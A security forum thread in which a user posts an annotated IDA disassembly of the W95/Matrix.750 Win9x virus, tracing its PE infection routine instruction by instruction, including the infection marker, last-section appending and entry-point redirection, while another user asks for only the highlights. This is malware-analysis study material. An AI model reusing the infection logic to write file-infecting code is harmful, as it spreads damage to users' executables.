Skip navigation.
Home

W95/Matrix.750 Analysis

|

Hi pals,i've analysed this virus i found somewhere in the wild. here is the analysis from my IDA disassembly listing.



; The main infection analysis is from offset : DATA:00402196
; This is a full static Analysis of the virus Matrix.750.
; A file Win9x file infector using encryption routines to make it's analysis harder.
; Once again this is not an obstacle, and the wonderful IDA just did its job by disassembling
; easily this Virus. see (www.datarescue.com).
; There is some ambiguities as you will see but as i dont have any Win9x at home,
; i could not do a runtime analysis with Ice or IDA.However this won't be an obstacle to our analysis.
;
; The Analysis is more focused on the infection methode. So you can skip some parts and
; jump to this address DATA:00402196 and see the comments.
;
; Feel free to contact me for any question
; Critics are welcome too.
;
; Analysis by asmatiks
; asmatx[\_at_/]yahoo[D0T]fr / Antithese[\_at_/]hairdresser[D0T]net
;
; 29/03/2007
;
; Here we go
CODE:00401000 ;
CODE:00401000 ; File Name : X:\Virus_Analysis_bin\SAMPLES_2_ANALYSE\Virus.Win32.Matrix.750\Virus.Win32.Matrix.750
CODE:00401000 ; Format : Portable executable for 80386 (PE)
CODE:00401000 ; Imagebase : 400000
CODE:00401000 ; Section 1. (virtual address 00001000)
CODE:00401000 ; Virtual size : 00001000 ( 4096.)
CODE:00401000 ; Section size in file : 00000200 ( 512.)
CODE:00401000 ; Offset to raw data for section: 00000600
CODE:00401000 ; Flags 60000020: Text Executable Readable
CODE:00401000 ; Alignment : default
CODE:00401000
CODE:00401000 .686p
CODE:00401000 .mmx
CODE:00401000 .model flat
CODE:00401000 ;when disassembling with IDA The following code
CODE:00401000 ;one need to convert it manually by pressing once the 'C' key.
CODE:00401000 ;i've realized it after analysis :)
CODE:00401000 ; ---------------------------------------------------------------------------
CODE:00401000
CODE:00401000 ; Segment type: Pure code
CODE:00401000 ; Segment permissions: Read/Execute
CODE:00401000 CODE segment para public 'CODE' use32
CODE:00401000 assume cs:CODE
CODE:00401000 ;org 401000h
CODE:00401000 assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
CODE:00401000 push 0
CODE:00401002 call near ptr loc_401011+6
CODE:00401007 push edi
CODE:00401008 imul ebp, [esi+33h], 614D2E32h
CODE:0040100F jz short near ptr dword_40101D+66h
CODE:00401011
CODE:00401011 loc_401011: ; CODE XREF: CODE:00401002p
CODE:00401011 imul edi, [eax+2Eh], 0FF303537h
CODE:00401018 and eax, offset ExitProcess
CODE:00401018 ; ---------------------------------------------------------------------------
CODE:0040101D dword_40101D dd 78h dup(0)
CODE:004011FD align 10h
CODE:00401200 dd 380h dup(?)
CODE:00401200 CODE ends
CODE:00401200
DATA:00402000 ; Section 2. (virtual address 00002000)
DATA:00402000 ; Virtual size : 00001000 ( 4096.)
DATA:00402000 ; Section size in file : 00000400 ( 1024.)
DATA:00402000 ; Offset to raw data for section: 00000800
DATA:00402000 ; Flags C0000040: Data Readable Writable
DATA:00402000 ; Alignment : default
DATA:00402000 ; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
DATA:00402000
DATA:00402000 ; Segment type: Pure data
DATA:00402000 ; Segment permissions: Read/Write
DATA:00402000 DATA segment para public 'DATA' use32
DATA:00402000 assume cs:DATA
DATA:00402000 ;org 402000h
DATA:00402000
DATA:00402000 ; ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ S U B R O U T I N E ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
DATA:00402000
DATA:00402000
DATA:00402000 public start
DATA:00402000 start proc near ; DATA XREF: DATA:00402294r
DATA:00402000 ; DATA:00402212w
DATA:00402000
DATA:00402000 var_20 = dword ptr -20h
DATA:00402000
DATA:00402000 push 1000h ; size
DATA:00402005
DATA:00402005 Virus_start: ; DATA XREF: DATA:0040221Bw
DATA:00402005 push 0
DATA:0040200A pusha ; save all regs before infection.useful for the return to HOST
DATA:0040200B call $+5 ; push the addr of the next instruction onto the stack
DATA:00402010
DATA:00402010 Delta: ; DATA XREF: start+11o
DATA:00402010 pop ebp ; pop the pushed addr. ebp Section_Header
DATA:004021FB movzx eax, word ptr [edx+6]
DATA:004021FF dec eax ; num of sections == num of section - 1
DATA:00402200 imul eax, 28h ; size of a section Header
DATA:00402203 add esi, eax ; esi -> Last Section !
DATA:00402205 mov eax, [esi+14h] ; eax

continuation ... can't paste the whole lising?



DATA:00402205 mov eax, [esi+14h] ; eax

dont paste

the whole ida disassembly.

it would be better to paste the highlights and more important infomation such as:

does it connect to a url or ip
is there a bot control
are there any email addresses
any strings that stand out
registry modifications
filesystem modifications
rootkit behavior
encryption

etc.

we can generally do our own disassembly :)

V.

continuation :)

right,it makes sense Valsmith,so here we go on the infection process:


loc_402196: ; CODE XREF: DATA:00402191
data:00402196 jnz short loc_4021BA
data:00402198 mov eax, [edx+3Ch] ; eax -> PE HEADER
data:0040219B mov ss:dword_4022A1[ebp], eax
data:004021A1 xchg eax, edx ; now EDX -> PE H
data:004021A2 call near ptr dword_4022BD
data:004021A7 mov cx, 238h ; for infection marker generation
data:004021AB lea edx, dword_40242C[ebp]
data:004021B1 mov ah, 3Fh
data:004021B3 call near ptr dword_4022BD
data:004021B8 xor ecx, eax ;ecx= infection marker
data:004021BA
data:004021BA loc_4021BA: ; CODE XREF: DATA:loc_402196j
data:004021BA jnz short loc_4021BF
data:004021BC cmp byte ptr [edx], 50h
data:004021BF
data:004021BF loc_4021BF: ; CODE XREF: DATA:loc_4021BAj
data:004021BF jnz short Check_EXE
data:004021C1 mov [edx+58h], ecx ; checksum field: "mark infected"
data:004021C4 test byte ptr [edx+17h], 20h
data:004021C8
data:004021C8 Check_EXE: ; CODE XREF: DATA:loc_4021BF
data:004021C8 jnz short Get_Last_Section
data:004021CA test byte ptr [edx+16h], 2 ; PE FLAG : 2 == EXE. checking type of PE module.
data:004021CE jz Virus_end
data:004021D4 cmp word ptr [edx+4], 14Eh ; check platform:intel x86
data:004021DA ja short loc_4021E1
data:004021DC mov al, [edx+6] ; AL cmp al, 8
; is num of section > 8 ?
data:004021E1
data:004021E1 Check_SectionNum: ;loc_4021E1:
data:004021E1 ja Virus_end
;if so abort
data:004021E7 cmp al, 2 ; is num of sections lea esi, [eax+edx+18h]; esi -> Section_Header
data:004021FB movzx eax, word ptr [edx+6]
data:004021FF dec eax ; num of sections == num of section - 1
data:00402200 imul eax, 28h ; size of a section Header
data:00402203 add esi, eax ; esi -> Last Section !
data:00402205 mov eax, [esi+14h]; eax add eax, [esi+10h]; point to size of Section Raw Data
data:0040220B cmp eax, edi ; ? == size of file alignment?
data:0040220D
data:0040220D Patch_Section_H: ; CODE XREF: DATA:Get_Last_Section
data:0040220D jnz short Exec_Vir
data:0040220F mov eax, [edx+28h]; eax mov eax, [edx+34h]; Image BAse
data:0040221B mov dword ptr ss:(Virus_start+1)[ebp], eax ; store IB here
data:00402221 lea eax, [edi-2EEh]; 2EEh = size of virus
data:00402227 mov edi, eax
data:00402229 sub eax, [esi+14h]; Calc EP
data:0040222C add eax, [esi+0Ch]; Section RVA
data:0040222F mov [edx+28h], eax; NEW EP points to virus code in the Section
data:00402232 or byte ptr [esi+27h], 0C0h
data:00402236 mov eax, [esi+10h]; eax add eax, 526h; new size Of raw data : sizeof raw data + 526h
data:0040223E push eax
data:0040223F mov ecx, [edx+3Ch]
data:00402242 dec ecx ; ecx and eax, ecx ; calc virtual size of section
data:00402249 cmp eax, [esi+8] ;
data:0040224C jb short Calc_MemSizeOfImage
data:0040224E mov [esi+8], eax ; virtual size of section
data:00402251
data:00402251 Calc_MemSizeOfImage: ; CODE XREF: DATA:0040224C
data:00402251 pop eax
data:00402252 add eax, [esi+0Ch]; eax mov ecx, [edx+38h]
; section Mem alignment
data:00402258 dec ecx
data:00402259 add eax, ecx
data:0040225B not ecx
data:0040225D and eax, ecx
data:0040225F cmp eax, [edx+50h]
data:00402262 jb short Infect_Host
data:00402264 mov [edx+50h], eax ; lea esi, dword_4022BD[ebp]
; ??? k32 function
data:0040226F mov edx, edi
data:00402271 call esi
data:00402273 mov ah, 3Fh
data:00402275 mov ecx, 2EEh ; size Of Virus Code : 2EE Hex = 750 Decimal,hence the name Matrix.750
data:0040227A lea edx, dword_402664[ebp]
data:00402280 call esi
data:00402282 push edi
data:00402283 mov edi, edx ; inject virus code here
data:00402285 sub al, al ;edi -> destination
data:00402287 repe scasb ; infect now! copy virus body to host
data:00402289 pop edx ;
data:0040228A ;finished

that's all the main infection process.
i point this out for the simple reason nowadays most of malware are Trojans and worms.
without heavily infecting PE modules.After a while it's almost the same wherease
analysing file infectors need much more effort, and it can be fun.
this virus has some more features such as decryption routines...available in the full
disassembly.I'll try to post a link for those who might be interested.